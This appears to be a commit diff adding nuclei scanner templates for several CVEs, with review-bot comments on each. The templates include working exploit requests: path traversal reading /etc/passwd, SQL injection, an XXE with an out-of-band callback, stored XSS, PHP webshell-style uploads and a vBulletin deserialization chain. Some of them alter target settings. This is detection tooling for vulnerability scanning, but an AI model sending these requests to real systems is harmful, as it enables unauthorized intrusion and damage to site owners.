- method: GET
path:
- "{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd"
- "{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd"
- "{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- text/plain
- type: status
status:
- 200
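Review bot: `tags: cve,cve2023,icinga,lfi` carries the wrong year for CVE-2022-24716; it should read `tags: cve,cve2022,icinga,lfi` so year-based tag filtering finds it. The template also has no `classification` block (`cvss-metrics`, `cvss-score`, `cve-id`, `cwe-id`), and its only reference is a proof-of-concept repository, whereas the other new templates in this commit list the NVD entry as well; `- https://nvd.nist.gov/vuln/detail/CVE-2022-24716` follows that pattern.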


@ -0,0 +1,46 @@
id: CVE-2022-27984
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: critical
description: |
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-27984
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-27984
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
@timeout: 20s
POST /templates/default/html/windows/right.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
menu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "components/menu/classes/functions.php")'
condition: and


@ -0,0 +1,55 @@
id: CVE-2022-27985
info:
name: Cuppa CMS v1.0 - SQL injection
author: theamanrawat
severity: critical
description: |
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-27985
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-27985
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,cuppa,authenticated
variables:
num: '999999999'
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
POST /alerts/alertLightbox.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200


@ -0,0 +1,44 @@
id: CVE-2022-3980
info:
name: Sophos Mobile managed on-premises - XML External Entity Injection
author: dabla
severity: critical
description: |
An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
reference:
- https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
- https://nvd.nist.gov/vuln/detail/CVE-2022-3980
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-611
cve-id: CVE-2022-3980
metadata:
max-request: 1
verified: "true"
shodan-query: http.favicon.hash:-1274798165
fofa-query: title="Sophos Mobile"
tags: cve,cve2022,xxe,ssrf,sophos
http:
- raw:
- |
@timeout: 50s
POST /servlets/OmaDsServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: "application/xml"
<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % test SYSTEM "http://{{interactsh-url}}">%test;]>
<cdl>test</cdl>
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
- "status_code == 400"
- "len(body) == 0"
condition: and
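Review bot: The raw request's header line `Content-Type: "application/xml"` sends the quote characters to the server as part of the header value, because quotes inside a block scalar are literal; every other raw request in this commit writes the media type bare, and this line should be `Content-Type: application/xml`. Whether the quoted form is what currently produces the expected `status_code == 400` with an empty body cannot be told from here, so the matcher may be passing for the wrong reason and should be re-verified after the fix. `verified: "true"` is a quoted string where the boolean is intended.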


@ -0,0 +1,80 @@
id: CVE-2022-42095
info:
name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.
reference:
- https://github.com/backdrop/backdrop/releases/tag/1.23.0
- https://github.com/bypazs/CVE-2022-42095
- https://nvd.nist.gov/vuln/detail/CVE-2022-42095
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2022-42095
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,cms,backdrop,authenticated
http:
- raw:
- |
GET /?q=user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
- |
GET /?q=node/add/page HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=node/add/page HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
title={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save
- |
POST /?q={{randstr}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- "status_code_5 == 200"
- "contains(all_headers_5, 'text/html')"
- 'contains(body_5, "<img src=\"x\" onerror=\"alert(document.domain)\" />")'
- "contains(body_5, 'Backdrop CMS')"
condition: and
extractors:
- type: regex
name: form_id_1
group: 1
regex:
- 'name="form_build_id" value="(.*)"'
internal: true
- type: regex
name: form_id_2
group: 1
regex:
- 'name="form_build_id" value="(.*)"'
internal: true
- type: regex
name: form_token
group: 1
regex:
- 'name="form_token" value="(.*)"'
internal: true
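Review bot: The fourth raw request hard-codes `name=admin` in its body while the login request uses `{{username}}`; it should be `name={{username}}` so the template works with whatever credential pair it is run with. The three extractors capture with the greedy `(.*)` inside `value="(.*)"`, which can run past the closing quote when several attributes share a line; `([^"]+)` is the safer capture. `form_id_1` and `form_id_2` also use the same regex with no request index, so each presumably holds whatever the most recent response yielded — a one-line comment above the extractors stating that this is the intended sequencing would keep the next reader from "fixing" it.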


@ -0,0 +1,185 @@
id: CVE-2022-42096
info:
name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.
reference:
- https://github.com/backdrop/backdrop/releases/tag/1.23.0
- https://github.com/bypazs/CVE-2022-42096
- https://nvd.nist.gov/vuln/detail/CVE-2022-42096
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2022-42096
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,cms,backdrop,authenticated
http:
- raw:
- |
GET /?q=user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
- |
GET /?q=node/add/post HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=node/add/post HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="title"
{{randstr}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_tags[und]"
{{randstr}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][summary]"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][value]"
<img src=x onerror=alert(document.domain)>
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][format]"
full_html
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_image[und][0][fid]"
0
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_image[und][0][display]"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="changed"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_build_id"
{{form_id_1}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_token"
{{form_token}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_id"
{{form_id_2}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="status"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="scheduled[date]"
2023-04-25
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="scheduled[time]"
16:59:23
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="promote"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="name"
{{name}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="date[date]"
2023-04-24
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="date[time]"
16:59:23
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="path[auto]"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="comment"
2
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="additional_settings__active_tab"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="op"
Save
------WebKitFormBoundaryIubltUxssi0yqDjp--
- |
GET /?q=posts/{{randstr}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src="x" onerror="alert(document.domain)" />'
- 'Backdrop CMS'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: form_id_1
group: 1
regex:
- 'name="form_build_id" value="(.*)"'
internal: true
- type: regex
name: name
group: 1
regex:
- 'name="name" value="(.*?)"'
internal: true
- type: regex
name: form_id_2
group: 1
regex:
- 'name="form_id" value="(.*)"'
internal: true
- type: regex
name: form_token
group: 1
regex:
- 'name="form_token" value="(.*)"'
internal: true
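Review bot: The word matcher at `part: body` is not pinned to a response index, so in a five-request chain it can also match earlier responses rather than only the final `GET /?q=posts/{{randstr}}`; the CVE-2022-42095 template in this same commit pins its checks to the fifth response with `body_5`/`status_code_5`. Changing the word matcher to `part: body_5` (and pinning the status check the same way) would make the result depend on the stored post alone. Separately, the `form_id_1`, `form_id_2` and `form_token` extractors use a greedy `(.*)` while the `name` extractor uses `(.*?)`; if another `value="..."` attribute shares the line the greedy form over-captures, so `(.*?)` is the safer choice for all four.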


@ -0,0 +1,56 @@
id: CVE-2022-4328
info:
name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
remediation: Fixed in version 18.0
reference:
- https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
- https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4328
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4328
cwe-id: CWE-434
metadata:
verified: "true"
tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597
--------------------------22728be7b3104597
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
<?php echo md5("CVE-2022-4328"); ?>
--------------------------22728be7b3104597--
- |
GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "fe5df26ce4ca0056ffae8854469c282f"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
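Review bot: The upload request names the file three different ways — `.pHp` in the `name` query parameter, `{{randstr}}.php` in the `Content-Disposition` filename, and a lower-cased `.php` in the verification GET — with nothing recording which one the plugin actually stores on disk, so the next maintainer is likely to "normalise" them and silently break the check. A one-line comment above the first raw request naming which of the three spellings the plugin honours (and why the case differs) would pin that down; the plugin's behaviour is not visible here, so confirm it before writing the comment. It is also worth stating in `description` that the probe leaves `{{randstr}}.php` under `wp-content/uploads/cfom_files/` on the target, since the template has no cleanup step.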


@ -0,0 +1,100 @@
id: CVE-2022-45037
info:
name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://shimo.im/docs/dPkpKPQEjXfvYoqO/read
- https://nvd.nist.gov/vuln/detail/CVE-2022-45037
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-45037
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wbce,cms,authenticated
http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/users/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/users/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
formtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
- |
GET /admin/users/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_5
words:
- "<script>alert(document.domain)</script>"
- "SESSION_TIMEOUT"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: username_fieldname
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true
- type: regex
name: password_fieldname
part: body
group: 1
regex:
- 'name="password_fieldname" value="(.*)"'
internal: true
- type: regex
name: formtoken
part: body
group: 1
regex:
- 'name="formtoken" value="(.*)"'
internal: true
- type: regex
name: username_fieldname_2
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true
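Review bot: The `username_fieldname_2` extractor duplicates `username_fieldname` (same regex, same `part: body`, both `internal`); as far as I can tell from how nuclei refreshes internal extractor values on each response, `{{username_fieldname}}` already carries the value from the `/admin/users/index.php` page by the time request 4 is built, so the second extractor can go and request 4 can reuse the first name. Note also that request 4 creates a new account `test-{{randstr}}` whose display name carries the payload and nothing removes it afterwards, so every administrator who opens `/admin/users/` after a scan executes it; that side effect belongs in `description`. The greedy `(.*)` in all four extractors would over-capture if another `value="` attribute shares the line — `(.*?)` is the safer form.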


@ -0,0 +1,100 @@
id: CVE-2022-45038
info:
name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://shimo.im/docs/Ee32MrJd80iEwyA2/read
- https://nvd.nist.gov/vuln/detail/CVE-2022-45038
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-45038
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wbce,cms,authenticated
http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/settings/ HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/settings/save.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
advanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=
- |
GET /search/index.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "Results For"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: username_fieldname
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true
- type: regex
name: password_fieldname
part: body
group: 1
regex:
- 'name="password_fieldname" value="(.*)"'
internal: true
- type: regex
name: formtoken
part: body
group: 1
regex:
- 'name="formtoken" value="(.*)"'
internal: true
- type: regex
name: app_name
part: body
group: 1
regex:
- 'name="app_name" value="(.*?)"'
internal: true
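Review bot: Request 4 posts the full `/admin/settings/save.php` form with hard-coded values (`default_template=wbcezon`, `default_theme=wbce_flat_theme`, `default_language=EN`, `wbmailer_routine=phpmail`, empty `wbmailer_smtp_*`, `frontend_login=false`, ...), so a scan overwrites the target's real settings and mail configuration, not just `website_footer`, and nothing restores them. Only `app_name` and `formtoken` are read from the settings page; the remaining fields could be extracted the same way so the POST echoes the current values, or at minimum `description` should say which settings the probe clobbers. The stored payload in the site footer also persists on every page after the scan, which is worth stating alongside it.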


@ -0,0 +1,131 @@
id: CVE-2022-46020
info:
name: WBCE CMS v1.5.4 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2022-46020
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-46020
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2022,rce,wbce,cms,authenticated
http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/settings/index.php?advanced=yes HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/settings/save.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=
- |
POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="reqid"
test
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="cmd"
upload
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="target"
l1_Lw
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php
echo md5("CVE-2022-46020");
?>
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="mtime[]"
test
-----------------------------213974337328367932543216511988--
- |
GET /media/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_6
words:
- "751a8ba516522786d551075a092a7a84"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: username_fieldname
part: body
group: 1
regex:
- 'name="username_fieldname" value="(.*)"'
internal: true
- type: regex
name: password_fieldname
part: body
group: 1
regex:
- 'name="password_fieldname" value="(.*)"'
internal: true
- type: regex
name: formtoken
part: body
group: 1
regex:
- 'name="formtoken" value="(.*)"'
internal: true
- type: regex
name: app_name
part: body
group: 1
regex:
- 'name="app_name" value="(.*)"'
internal: true
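Review bot: Same concern as the CVE-2022-45038 template in this commit, but broader: request 4 submits the advanced settings form with hard-coded values (`website_title=test`, empty `website_description`/`website_keywords`/`website_header`/`website_footer`, `rename_files_on_upload=` cleared, `er_level=E0`, `redirect_timer=1500`, editor and template choices), so a scan overwrites the target's site title, metadata and upload policy and does not restore them; reading those fields from the `advanced=yes` settings page with extractors, as is already done for `app_name` and `formtoken`, would avoid that. The probe also leaves `/media/{{randstr}}.php` on the target with no cleanup step, which `description` should mention. Minor: the `app_name` extractor uses a greedy `(.*)` here but `(.*?)` in the 45038 template — keep them consistent (non-greedy).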


@ -0,0 +1,47 @@
id: CVE-2023-1020
info:
name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
reference:
- https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff
- https://wordpress.org/plugins/wp-shoutbox-live-chat/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1020
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-1020
cwe-id: CWE-89
metadata:
verified: "true"
tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
matchers-condition: and
matchers:
- type: word
part: body
words:
- "c8c605999f3d8352d7bb792cf3fdb25b"
- "no_participation"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
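Review bot: The long hex literal inside the `last_timestamp` payload is opaque to the next maintainer; it is the hex encoding of the ASCII string `c8c605999f3d8352d7bb792cf3fdb25b` that the body matcher looks for, and the two must stay in sync. A comment above the raw request, `# the 0x63386336...3562 literal is the hex-encoded ASCII of the marker matched below (c8c605999f3d8352d7bb792cf3fdb25b)`, would record that relationship. The matcher also requires `no_participation`, presumably a token of the plugin's JSON reply — a short note on where that string comes from would help too.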


@ -14,7 +14,7 @@ info:
shodan-query: title:"vRealize Log Insight"
tags: cve,cve2023,vmware,aria,rce,oast
requests:
http:
- raw:
- |
GET /csrf HTTP/1.1


@ -0,0 +1,49 @@
id: CVE-2023-25135
info:
name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
reference:
- https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
- https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py
- https://nvd.nist.gov/vuln/detail/CVE-2023-25135
- https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch
remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-502
metadata:
max-request: 1
verified: "true"
google-query: intext:"Powered By vBulletin"
shodan-query: http.component:"vBulletin"
tags: cve,cve2023,vbulletin,rce,kev
http:
- raw:
- |
POST /ajax/api/user/save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'string(14)'
- '"CVE-2023-25135"'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
